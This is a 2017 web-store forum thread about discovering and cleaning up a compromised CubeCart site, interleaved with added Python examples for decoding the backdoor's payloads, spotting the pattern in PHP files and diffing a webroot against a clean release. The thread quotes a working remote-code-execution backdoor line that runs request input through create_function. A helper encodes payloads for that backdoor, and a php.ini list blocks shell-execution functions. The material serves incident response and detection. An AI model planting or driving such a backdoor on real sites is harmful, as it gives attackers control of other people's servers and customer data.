jbranscum Posted May 13, 2017 (edited)

Hello all. I recently made the switch from a modded v5 to 6.1.7 using these fantastic instructions from smither, but I have a nagging sense that these two hooks I'm seeing may not be part of CC. To my knowledge, my previous v5 modded site was never compromised and the only people that had access to it were myself, my spouse and the third party that did the aforementioned modding. They were enabled after the update but I have since disabled them. Thoughts?

By the way, v6 runs very well on nginx with a few tweaks.

EDIT: Never mind; I've answered my own question. I decoded the hooks and they're both decidedly nefarious; looks like the store was compromised or the third party left us "presents". No way of getting a time period on when they were added, so it's hard to know if they were present for two weeks or two years. There is a lot of file manipulation in the decoded script, so I'm going to go with 'compromised site'.

Edited May 13, 2017 by jbranscum (derp so hard)
havenswift-hosting Posted May 13, 2017

They look extremely suspect to me and I would say 100% that your store has been compromised. Google Analytics doesn't need any hooks and the naming is to try and persuade you that they are legit. You need to remove them completely (delete from admin and remove the file itself); however, what you could also do is base64_decode that code to see exactly what it was doing. Chances are that other areas of the store / files are compromised (adding hooks like that is done for a reason).

Ian
jbranscum Posted May 13, 2017 (Author)

Both hooks are identical; the first is a very simple decode that does a lot of file manipulation. The second one I don't have enough PHP wits to crack:

    $f = create_function('', base64_decode(strtr(str_replace(chr(10), '', $_REQUEST['c0d3']), '-_,', '+/=')));

Something about replacing a newline, but the rest doesn't make much sense in context.
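What that one line does: it reads the request parameter `c0d3`, strips newlines (`chr(10)`), maps a URL-safe base64 alphabet back to the standard one (`-` to `+`, `_` to `/`, and `,` standing in for the `=` padding so the payload survives in a query string), base64-decodes the result, and hands the resulting text to `create_function()` as PHP source. Whatever the attacker sends becomes a callable function; the quoted line stops at the assignment, so the call to `$f()` that presumably follows is not shown in the thread and is assumed here. The Python below is an added example, not code from the thread or from CubeCart: it reproduces the decode so you can see what a captured request would have executed, and it flags source files that carry the same request-input-into-dynamic-code pattern. The sample hook line is the one quoted above; the benign line and the `phpinfo();` payload are constructed for the demonstration.

```python
"""
Added example (not from the thread): reproduce the decode step the posted hook
performs on the 'c0d3' request parameter, and flag PHP sources that carry the
same pattern. Assumes the rest of the hook (not quoted) eventually calls $f().
"""
import base64
import re

# strtr($s, '-_,', '+/='): the hook uses a URL-safe base64 alphabet with ','
# standing in for the '=' padding, so the payload survives in a query string.
_TO_STANDARD_B64 = str.maketrans('-_,', '+/=')
_TO_HOOK_ALPHABET = str.maketrans('+/=', '-_,')


def decode_c0d3(param):
    """PHP source that create_function('', ...) would compile from the parameter.

    Mirrors base64_decode(strtr(str_replace(chr(10), '', $param), '-_,', '+/=')).
    """
    cleaned = param.replace('\n', '').translate(_TO_STANDARD_B64)
    return base64.b64decode(cleaned, validate=True).decode('utf-8', errors='replace')


def encode_c0d3(php_body):
    """Inverse of decode_c0d3: what an operator's request carries. Useful for
    building test traffic against a WAF/IDS rule."""
    return base64.b64encode(php_body.encode('utf-8')).decode('ascii').translate(_TO_HOOK_ALPHABET)


# Indicators: run-time code construction, a decoder, and untrusted input. Each
# alone is common in legitimate PHP; request input feeding dynamic code is not.
_INDICATORS = {
    'dynamic_code': re.compile(r'\b(create_function|eval|assert)\s*\(', re.I),
    'decoder': re.compile(r'\b(base64_decode|str_rot13|gzinflate|gzuncompress|strrev)\s*\(', re.I),
    'request_input': re.compile(r'\$_(REQUEST|GET|POST|COOKIE|SERVER)\s*\[', re.I),
}


def classify_php(source):
    """Return the set of indicator names present in a PHP source string."""
    return {name for name, rx in _INDICATORS.items() if rx.search(source)}


def looks_like_backdoor(source):
    """True when request input reaches run-time code construction."""
    return {'dynamic_code', 'request_input'} <= classify_php(source)


# Constructed samples: the line quoted in the thread, and a benign page that
# merely echoes a parameter (request input, but no dynamic code).
HOOK_LINE = ("$f = create_function('',base64_decode(strtr(str_replace(chr(10),'',"
             "$_REQUEST['c0d3']), '-_,', '+/=')));")
BENIGN_LINE = "<?php echo htmlspecialchars($_GET['q']);"

if __name__ == '__main__':
    payload = encode_c0d3("phpinfo();")                   # what the request carries
    print(payload)                                        # cGhwaW5mbygpOw,,
    print(decode_c0d3(payload[:8] + '\n' + payload[8:]))  # newline is stripped first
    print(classify_php(HOOK_LINE), looks_like_backdoor(HOOK_LINE))
    print(classify_php(BENIGN_LINE), looks_like_backdoor(BENIGN_LINE))
```

If you still have any access log lines with a `c0d3=` parameter, feeding the value to `decode_c0d3()` tells you exactly what was run; the indicator check is deliberately coarse and is meant as a triage filter over a webroot, not as proof on its own.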
havenswift-hosting Posted May 13, 2017

The only safe thing to do is to assume that your store is compromised. After completely removing the hooks (database and actual file, which incidentally would give you an idea when they were uploaded) you will need to clean the store. A re-upload of all 6.1.7 files again is a good start, and then a visual inspection of all files and directories is belt and braces.

Ian
jbranscum Posted May 13, 2017 (Author)

Thanks for pointing out that there would be an associated file: May 13, 2016. Quite the coincidence that I'd happen to find the exploits exactly one year later. Unfortunately I don't have the Apache logs from that time to review what was done. Thanks again for the help.
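The "re-upload 6.1.7 and inspect everything" advice above can be made systematic: extract the clean 6.1.7 package next to a copy of the live webroot and diff the two trees by content hash. Anything present only in the live copy (the hooks) or differing from the release (the file that includes them) is what needs a look, and the mtime of each such file is the same clue that dated the hook here to May 2016. The Python below is an added example, not code from the thread or from CubeCart; it builds two small throwaway trees so it runs offline. The file names in the sample, the `google_analytics.php` hook name and the choice to ignore `includes/global.inc.php` (which I take to be the per-site config that legitimately differs) are assumptions; point it at your real directories and adjust the ignore list to your install.

```python
"""
Added example (not from the thread): compare a live webroot against a clean
extract of the same release, report added/changed files, and read the mtime of
anything suspicious. Paths and the ignore list are assumptions; adjust them.
"""
import hashlib
import os
import shutil
import tempfile
from datetime import datetime, timezone


def sha256_file(path, chunk=1 << 16):
    h = hashlib.sha256()
    with open(path, 'rb') as fh:
        for block in iter(lambda: fh.read(chunk), b''):
            h.update(block)
    return h.hexdigest()


def hash_tree(root):
    """Relative POSIX path -> sha256 for every regular file under root."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, '/')
            digests[rel] = sha256_file(full)
    return digests


def diff_trees(clean_root, live_root, ignore=()):
    """Files only in live (added), differing (modified) or gone (missing).
    ignore: path prefixes that legitimately differ (per-site config, uploads)."""
    clean, live = hash_tree(clean_root), hash_tree(live_root)
    result = {'added': [], 'modified': [], 'missing': []}
    for rel, digest in live.items():
        if rel.startswith(ignore):
            continue
        if rel not in clean:
            result['added'].append(rel)
        elif clean[rel] != digest:
            result['modified'].append(rel)
    result['missing'] = [rel for rel in clean if rel not in live and not rel.startswith(ignore)]
    for key in result:
        result[key].sort()
    return result


def mtime_utc(path):
    """Filesystem mtime as ISO-8601 UTC. This is the clue that dated the hook in
    the thread; treat it as a hint only, since an attacker can set it (touch -d)."""
    return datetime.fromtimestamp(os.stat(path).st_mtime, tz=timezone.utc).isoformat()


def demo():
    """Constructed sample trees: a three-file 'release' and a live copy where the
    config differs legitimately, index.php was altered and a hook with a
    reassuring name was dropped in."""
    clean = tempfile.mkdtemp(prefix='cc617-clean-')
    live = tempfile.mkdtemp(prefix='cc617-live-')
    release = {
        'index.php': b"<?php // release file\n",
        'classes/hook.class.php': b"<?php class Hook {}\n",
        'includes/global.inc.php': b"<?php // placeholder config\n",
    }
    try:
        for root in (clean, live):
            for rel, data in release.items():
                path = os.path.join(root, rel)
                os.makedirs(os.path.dirname(path), exist_ok=True)
                with open(path, 'wb') as fh:
                    fh.write(data)
        # Per-site config legitimately differs; the two tampering steps do not.
        with open(os.path.join(live, 'includes', 'global.inc.php'), 'ab') as fh:
            fh.write(b"// site-specific settings\n")
        with open(os.path.join(live, 'index.php'), 'ab') as fh:
            fh.write(b"include 'hooks/google_analytics.php';\n")
        hook = os.path.join(live, 'hooks', 'google_analytics.php')
        os.makedirs(os.path.dirname(hook), exist_ok=True)
        with open(hook, 'wb') as fh:
            fh.write(b"<?php $f = create_function('', base64_decode($_REQUEST['c0d3']));\n")
        report = diff_trees(clean, live, ignore=('includes/global.inc.php',))
        report['hook_mtime'] = mtime_utc(hook)
        return report
    finally:
        shutil.rmtree(clean, ignore_errors=True)
        shutil.rmtree(live, ignore_errors=True)


if __name__ == '__main__':
    for key, value in demo().items():
        print(key, value)
```

Run `diff_trees()` against the real trees and every entry under `added` and `modified` gets opened by hand; also remember that the hook registrations live in the database, so the file diff complements the admin-side removal rather than replacing it.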
jbranscum Posted May 13, 2017 (Author)

One more reply for anyone that is looking to secure their PHP installation in the future; add the following to your php.ini file:

    disable_functions = exec, system, passthru, pcntl_exec, popen, proc_open, shell_exec
bsmither Posted May 13, 2017

There are a few older versions of CubeCart that have a vulnerability. (I would hope that these versions are not available for download from CubeCart's download center, or if they are, the vulnerability has been patched in those packages.)
havenswift-hosting Posted May 14, 2017

> 16 hours ago, jbranscum said:
> One more reply for anyone that is looking to secure their PHP installation in the future; add the following to your php.ini file:
> disable_functions = exec, system, passthru, pcntl_exec, popen, proc_open, shell_exec

If it is your own dedicated server then that is good advice (although the list of functions included is up for debate; we block a couple more, and if you are drastic, you can block 40 plus). But if, like most on here, you are on a shared server and your hosting company hasn't even added this simple precaution, then you should question their commitment to the security of your website.

> 15 hours ago, bsmither said:
> There are a few older versions of CubeCart that have a vulnerability. (I would hope that these versions are not available for download from CubeCart's download center, or if they are, the vulnerability has been patched in those packages.)

All previous versions are available and are as they were originally released (I don't know any software package that would back-patch all previous versions, and why would you?), but maybe @Al Brookbanks should add a very large bold red warning on the downloads page to only ever download and run the latest version, as that has the most up-to-date security patches. But then again, surely that is common sense?!

Ian